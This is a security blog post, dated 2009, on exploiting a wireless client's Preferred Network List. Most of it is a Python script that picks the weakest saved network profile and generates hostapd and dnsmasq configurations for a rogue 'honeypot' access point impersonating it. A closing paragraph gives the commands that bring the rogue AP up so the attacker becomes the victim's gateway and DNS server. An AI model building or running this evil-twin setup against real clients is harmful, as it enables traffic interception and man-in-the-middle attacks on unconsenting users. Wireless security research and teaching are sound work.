Tuesday, August 11, 2009

Beyond WiFish-Finder

In the previous post we saw how WiFish-Finder can discover the security settings of the SSIDs configured on a wireless client. The natural next question is: fine, you have found the security settings of the SSIDs in my Preferred Network List (PNL), but how can that information be used? How does it make my client vulnerable?

The answer: your client is vulnerable if any SSID in its PNL is configured for an open or weakly secured AP. An attacker can use this information to set up a "honeypot AP" that advertises the same SSID with the same security settings, and your client will connect to it (for an open network the attacker needs nothing more; for a WEP or WPA-PSK profile the attacker must know or crack the key first, since the honeypot has to use the same key). Once your client has associated with the attacker's AP, a layer-2 connection already exists. If your client is configured to use DHCP and the honeypot AP runs a DHCP server, the client takes an IP address from the attacker, who now has a layer-3 connection to your client as well. What an attacker can do once he has that layer-3 connection is not covered in this post, but later posts will go into it.

Access points that can be considered weakly secured:
1. Open authentication, no encryption
2. Open authentication, WEP encryption (the WEP key can easily be broken)
3. Shared Key authentication, WEP encryption (SKA just makes the key easier to crack, because the challenge/response exposes keystream)
4. WPA/WPA2-PSK (only an offline dictionary attack against a captured four-way handshake is possible, so a strong passphrase is safe)
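The two ideas above, triaging a client's PNL by how weakly each profile is secured and then mirroring the weakest one with a honeypot AP that also hands out DHCP leases, fit naturally into one small script. The following is an added example written for this post; it is not WiFish-Finder's own code, and the PNL entries it feeds itself are constructed. It emits standard hostapd.conf and dnsmasq.conf options (auth_algs, wep_key0, wpa_passphrase, dhcp-range and so on); the interface name wlan0, channel 6 and the 10.0.0.0/24 range are assumptions for the example.

```python
"""Triage a client's Preferred Network List (PNL) and draft the honeypot-AP
configuration that mirrors its weakest entry.

Added example for this post, not WiFish-Finder's own code. The PNL in demo()
is constructed; wlan0, channel 6 and 10.0.0.0/24 are assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class PnlEntry:
    ssid: str
    auth: str                  # "open", "shared", "psk" or "802.1x"
    encryption: str            # "none", "wep", "tkip" or "ccmp"
    key: Optional[str] = None  # WEP key / WPA passphrase, if the attacker has it


# Ranking taken from the post's list of weakly secured APs; lower = easier to impersonate.
#   0  open, no encryption      -> honeypot needs no key at all
#   1  WEP (open or shared key) -> key is crackable, then the honeypot mirrors it
#   2  WPA/WPA2-PSK             -> only an offline dictionary attack on the passphrase
#   3  WPA/WPA2 with 802.1X     -> needs an EAP-level attack (later posts)
def weakness(entry: PnlEntry) -> int:
    if entry.auth == "802.1x":
        return 3
    if entry.auth == "open" and entry.encryption == "none":
        return 0
    if entry.auth in ("open", "shared") and entry.encryption == "wep":
        return 1
    if entry.auth == "psk" and entry.encryption in ("tkip", "ccmp"):
        return 2
    raise ValueError(f"unrecognised security settings for {entry.ssid!r}")


def is_vulnerable(entry: PnlEntry) -> bool:
    """True for any profile in the post's 'weakly secured' list (ranks 0-2)."""
    return weakness(entry) <= 2


def pick_target(pnl: List[PnlEntry]) -> Optional[PnlEntry]:
    """The entry a honeypot would impersonate first: the weakest one that is
    actually impersonable (open, or WEP/PSK with the key already in hand)."""
    usable = [e for e in pnl if weakness(e) == 0 or (is_vulnerable(e) and e.key)]
    return min(usable, key=weakness, default=None)


def _wep_key_line(key: str) -> str:
    # hostapd takes 40/104-bit keys as 10/26 hex digits, or 5/13 ASCII chars in quotes.
    is_hex = all(c in "0123456789abcdefABCDEF" for c in key)
    if is_hex and len(key) in (10, 26):
        return f"wep_key0={key}"
    if len(key) in (5, 13):
        return f'wep_key0="{key}"'
    raise ValueError("WEP key must be 10/26 hex digits or 5/13 ASCII characters")


def hostapd_conf(entry: PnlEntry, interface: str = "wlan0", channel: int = 6) -> str:
    """hostapd.conf advertising entry.ssid with the same security settings."""
    if weakness(entry) == 3:
        raise ValueError("802.1X profiles cannot be mirrored by a plain open/WEP/PSK honeypot")
    lines = [f"interface={interface}", "driver=nl80211", f"ssid={entry.ssid}",
             "hw_mode=g", f"channel={channel}"]
    if entry.encryption == "none":
        lines.append("auth_algs=1")                       # open system auth, no key
    elif entry.encryption == "wep":
        if not entry.key:
            raise ValueError("WEP profile: crack the key first, the honeypot must use it")
        lines.append("auth_algs=2" if entry.auth == "shared" else "auth_algs=1")
        lines += ["wep_default_key=0", _wep_key_line(entry.key)]
    else:  # WPA/WPA2-PSK; without the real passphrase the 4-way handshake fails
        if not entry.key or not 8 <= len(entry.key) <= 63:
            raise ValueError("PSK profile: need the passphrase (8-63 chars)")
        lines += ["wpa=3", "wpa_key_mgmt=WPA-PSK", "wpa_pairwise=TKIP",
                  "rsn_pairwise=CCMP", f"wpa_passphrase={entry.key}"]
    return "\n".join(lines) + "\n"


def dnsmasq_conf(interface: str = "wlan0", gateway: str = "10.0.0.1") -> str:
    """DHCP server on the honeypot so the victim takes its layer-3 address,
    default router and DNS server from the attacker's box."""
    net = gateway.rsplit(".", 1)[0]
    return "\n".join([
        f"interface={interface}",
        "bind-interfaces",
        f"dhcp-range={net}.10,{net}.250,12h",
        f"dhcp-option=3,{gateway}",   # option 3: default router
        f"dhcp-option=6,{gateway}",   # option 6: DNS server
    ]) + "\n"


def demo() -> str:
    # Constructed PNL, in the shape WiFish-Finder would report for a laptop.
    pnl = [
        PnlEntry("CorpWLAN", "802.1x", "ccmp"),
        PnlEntry("HomeNet", "psk", "ccmp"),                        # passphrase unknown
        PnlEntry("OldRouter", "shared", "wep", key="1234567890"),  # key already cracked
        PnlEntry("FreeAirportWiFi", "open", "none"),
    ]
    target = pick_target(pnl)
    if target is None:
        return "# nothing in this PNL can be impersonated\n"
    return hostapd_conf(target) + dnsmasq_conf()


if __name__ == "__main__":
    print(demo())
```

In the constructed PNL the open "FreeAirportWiFi" profile wins over the cracked-WEP "OldRouter" because it needs no key at all. To run the honeypot you would write the two outputs to files, give the interface the gateway address (`ip addr add 10.0.0.1/24 dev wlan0`), start `hostapd honeypot.conf`, then `dnsmasq -C dnsmasq.conf`; once the victim associates and takes a lease, the attacker has the layer-3 foothold the post describes.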

The most secure configuration as of this writing is WPA/WPA2 with 802.1X authentication. In the coming posts we will see how a MITM attack is still possible in some cases even when the client uses this most secure configuration (WPA/WPA2, 802.1X, PEAP).
